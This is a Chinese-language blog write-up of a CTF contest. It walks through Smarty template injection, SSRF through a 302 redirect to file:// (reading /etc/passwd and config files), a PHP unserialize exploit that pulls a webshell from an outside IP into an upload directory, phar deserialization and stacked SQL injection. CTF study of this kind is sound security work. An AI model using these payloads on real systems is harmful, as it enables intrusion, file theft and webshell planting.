Leon's Blog
Posts Tags Categories Links About
Leon's Blog

Contents

四叶草安全牛年CTF大赛

Leon included in Writeup
   1108 words   3 minutes    views  

寒假没怎么打CTF,后面的AntCTF、D^3CTF刚好在开学的时间段,四叶草安全举办的小比赛,都是简单题,随便看看

GET

smarty模板注入

可以使用{if phpinfo()}{/if}执行任意php代码

用header绕一下flag关键字就行

https://leonsec.gitee.io/images/image-20210225102444791.png

1
2
3

?flag={if%20show_source(array_rand(array_flip(getallheaders())))}{/if} 
header:
0: flag.php

Website

给了一个提交url页面,测试发现是后端访问,猜测是php的curl

https://leonsec.gitee.io/images/image-20210225123109530.png

测试发现,只能以http或者https协议开头,尝试302重定向绕过

1
2
3
4

<?php
header("Location: file:///etc/passwd");
exit;
?>

读到/etc/passwd

尝试直接读flag,但是并没有什么发现

通过/proc/self/cwd/index.php读到了源码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

<?php
error_reporting(0);
function check_302($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 302 redirect
    curl_exec($ch);
    $info = curl_getinfo($ch);
    curl_close($ch);
    return $info['url'];
}

if (isset($_GET['url'])) {
    $url = $_GET['url'];
    if (strpos($url, 'http://127.0.0.1/') === 0 || strpos($url, 'http://localhost/') === 0) {
        exit("<script>alert('Cloversec WAF!')</script>");
    }

    if (!preg_match('/^(http|https):\/\/[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*/i', $url)) {
        exit("<script>alert('Cloversec WAF!')</script>");
    }

    $url = check_302($url);
    echo $url;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $result = curl_exec($ch);
    curl_close($ch);

    echo "<div class='yulan'><head> <base href='" . $url . "/'>  </head><!--  以下是正文     --><br>" . $result . "</div>";
} else {
    echo "<div class='yulan'><h2>Hello</h2></div>";
}

?>

然后根据响应看到是Server: Apache/2.2.15,该版本的配置文件路径为:/etc/httpd/conf/httpd.conf

读到了:

1
2
3
4
5
6
7

<VirtualHost _default_:80>
DocumentRoot /var/www/html/web1
</VirtualHost>

<VirtualHost *:8080>
    DocumentRoot /var/www/html/web2
</VirtualHost>

读web2源码:

/var/www/html/web2/index.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

<?php
class copy_file{
    public $path = 'upload/';
    public $file;
    public $url;
    function __destruct(){
        if(strpos($this -> url,'http://127.0.0.1') === 0){
            file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));
            echo $this -> path.$this -> file." update successed!)<br>";
        }else{
            echo "Hello CTFer";
        }
    }
}

if(isset($_GET['data'])){
    $data = $_GET['data'];
    unserialize($data);
}else{
    echo "<h2>Welcome to CloverSec WebSite<h2>";
}
?>

简单构造一下,写个shell:

这里试了直接web1路径,但是没权限,只有web2的upload目录可写

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

<?php
class copy_file{
    public $path = 'upload/';
    public $file;
    public $url;
    function __destruct(){
		var_dump(strpos($this -> url,'http://127.0.0.1') === 0);
        if(strpos($this -> url,'http://127.0.0.1') === 0){
            file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));
            echo $this -> path.$this -> file." update successed!)<br>";
        }else{
            echo "Hello CTFer";
        }
    }
}
$a = new copy_file();
$a->file = 'a.php';
$a->url = 'http://127.0.0.1@47.102.210.191:8000/a.txt';
echo urlencode(serialize($a));
?>

@绕一下开头,a.txt内容为get的一句话,方便使用

1
2
3
4

<?php
header("Location: http://127.0.0.1:8080/?data=O%3A9%3A%22copy_file%22%3A3%3A%7Bs%3A4%3A%22path%22%3Bs%3A7%3A%22upload%2F%22%3Bs%3A4%3A%22file%22%3Bs%3A5%3A%22a.php%22%3Bs%3A3%3A%22url%22%3Bs%3A42%3A%22http%3A%2F%2F127.0.0.1%4047.102.210.191%3A8000%2Fa.txt%22%3B%7D");
exit;
?>

https://leonsec.gitee.io/images/image-20210225124806999.png

https://leonsec.gitee.io/images/image-20210225124927459.png

shell弹不出来,看到web2路径才发现flag_WebSite_SsRf.txt

直接访问:http://4b7c0f6a.yunyansec.com/index.php?url=http://127.0.0.1:8080/flag_WebSite_SsRf.txt

https://leonsec.gitee.io/images/image-20210225125306041.png

flag{d195eeb026cadd7d00e79d112b102f00}

filemange

code.html给了源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

<?php
$path = "./sandbox/";
class game
{
    public $file_name;
    public $content = "Hello World";
    public function __construct($file_name)
    {
        $this->file_name = $file_name;
    }
    public function __wakeup()
    {
        if (strpos($this->content, "php")) {
            die("Hacker...");
        }
    }
    public function __destruct()
    {
        $this->test();
    }
    public function test()
    {
        $filename = "/var/www/html/" . $this->file_name;
        file_put_contents($filename, $this->content);
        echo $this->file_name . " create Successful!!!";
    }

}
if ($method == "unlink") {
        if (!isset($_POST['file'])) {
            echo 'unlink html form';
        } else {
            $file = $_POST['file'];
            if (!unlink($file)) {
                echo "删除失败";
            } else {
                echo "删除成功";
            }
        }

    }
?>

很明显phar反序列化,构造一下生成phar文件改后缀上传即可

StAck3d 1nj3c

[SUCTF 2019]EasySQL类似

1

1;set sql_mode=PIPES_AS_CONCAT;select 1
Updated on 2021-02-27
 SSRFSQL注入unserialize
Back | Home